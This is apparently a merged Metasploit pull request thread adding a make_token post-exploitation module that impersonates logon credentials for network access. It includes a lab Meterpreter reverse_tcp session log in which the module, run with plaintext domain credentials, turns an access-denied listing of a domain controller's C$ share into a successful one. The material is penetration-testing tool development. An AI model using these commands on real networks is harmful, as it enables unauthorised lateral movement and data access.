Add update_token to MSF + make_token post-ex module

[attl4s]

This PR adds the ruby code needed to leverage the new update_token function explained at rapid7/metasploit-payloads#648, for Meterpreter's stdapi extension. It also adds a new post-ex module using the new functionality:

• post/windows/manage/make_token

This module mimics Cobalt Strike's make_token command. In its default configuration, this module creates a new network security context with the specified logon data (username, domain and password). Under the hood, Meterpreter's access token is cloned, and a new logon session is created and linked to that token. The token is then impersonated to acquire the new network security context. This module has no effect on local actions - only on remote ones (where the specified credential material is used) and it does not validate the credentials specified. For advanced users, the default logon type (LOGON32_LOGON_NEW_CREDENTIALS) can be changed to any other valid value.

An example can be seen below.

The Meterpreter session is running as CAP\vegeta (low-priv domain user). With plaintext credentials, we can use the new module to act on behalf of CAP\bulma_da (domain admin) in the network. As can be seen, the directory listing call to \dc01\C$ works after using the module.

[smcintyre-r7]

Do you have any context you can provide as to why this is only the case for this particular logon type?

[attl4s]

I believe the LOGON32_LOGON_NEW_CREDENTIALS logontype is the only one that duplicates the original access token of the user, thus has no result on local actions. It only updates the logon session ID to a new logon session with the specified credentials for network access

[github-actions]

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

• Writing Module Documentation
• Template
• Examples

[smcintyre-r7]

BadConfig might be a better fit for this error because the session is user configurable.

[attl4s]

39b4569 + 217df62 😋

[smcintyre-r7]

@attl4s The payloads side of this has been landed and the gem has been bumped so we're no longer blocked on that. The last two things we need for this to get landed is for the module docs to be written and for the module to be linted.

[github-actions]

Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.

We use Rubocop and msftidy to ensure the quality of our code. This can be ran from the root directory of Metasploit:

rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>

You can automate most of these changes with the -a flag:

rubocop -a <directory or file>

Please update your branch after these have been made, and reach out if you have any problems.

[attl4s]

@attl4s The payloads side of this has been landed and the gem has been bumped so we're no longer blocked on that. The last two things we need for this to get landed is for the module docs to be written and for the module to be linted.

Awesome! -> a34c3cf and ec948b5

[smcintyre-r7]

Everything looks good to me and I've gone ahead and landed this module.

msf6 payload(windows/x64/meterpreter/reverse_tcp) > [*] Meterpreter session 5 opened (192.168.159.128:4444 -> 192.168.159.70:61682) at 2023-06-01 17:02:10 -0400
sessions -i -1
[*] Starting interaction with 5...

meterpreter > getuid
Server username: MSFLAB\aliddle
meterpreter > sysinfo
Computer        : WINDOWS-11-VM
OS              : Windows 10 (10.0 Build 22621).
Architecture    : x64
System Language : en_US
Domain          : MSFLAB
Logged On Users : 9
Meterpreter     : x64/windows
meterpreter > ls \\\\dc\\C$
[-] stdapi_fs_stat: Operation failed: Access is denied.
meterpreter > run post/windows/manage/make_token username=smcintyre password=Password2! domain=msflab.local

[*] Executing rev2self to revert any previous token impersonations
[*] Executing LogonUserA with the flag LOGON32_LOGON_NEW_CREDENTIALS to create a new security context for msflab.local\smcintyre
[*] Impersonating the new security context...
[+] The session should now run with the new security context!
[!] Remember that this will not have any effect on local actions (i.e. getuid will still show the original user)
meterpreter > getuid
Server username: MSFLAB\aliddle
meterpreter > ls \\\\dc\\C$
Listing: \\dc\C$
================

Mode              Size        Type  Last modified              Name
----              ----        ----  -------------              ----
040777/rwxrwxrwx  0           dir   2023-02-10 09:59:20 -0500  $Recycle.Bin
040777/rwxrwxrwx  0           dir   2022-08-05 15:16:50 -0400  Documents and Settings
040777/rwxrwxrwx  0           dir   2023-05-25 13:52:45 -0400  PerfLogs
040555/r-xr-xr-x  0           dir   2023-05-31 17:00:51 -0400  Program Files
040777/rwxrwxrwx  0           dir   2023-05-31 17:00:51 -0400  Program Files (x86)
040777/rwxrwxrwx  0           dir   2022-08-05 15:26:01 -0400  ProgramData
040777/rwxrwxrwx  0           dir   2022-08-05 15:16:50 -0400  Recovery
040777/rwxrwxrwx  0           dir   2023-02-10 12:53:39 -0500  System Volume Information
040555/r-xr-xr-x  0           dir   2023-02-10 09:59:14 -0500  Users
040777/rwxrwxrwx  0           dir   2023-05-30 08:36:40 -0400  Windows
100666/rw-rw-rw-  1342177280  fil   2023-06-01 08:37:35 -0400  pagefile.sys

meterpreter >

I made a few minor changes in d8870d7 to bring the module docs inline with the standard format and address the warnings from msftidy_docs.rb.

Thanks for this contribution!

[smcintyre-r7]

Release Notes

This adds the post/windows/manage/make_token module which is capable of creating new tokens from known credentials and then setting them in a running instance of Meterpreter, which can allow that session to access resources it might not have previously been able to access.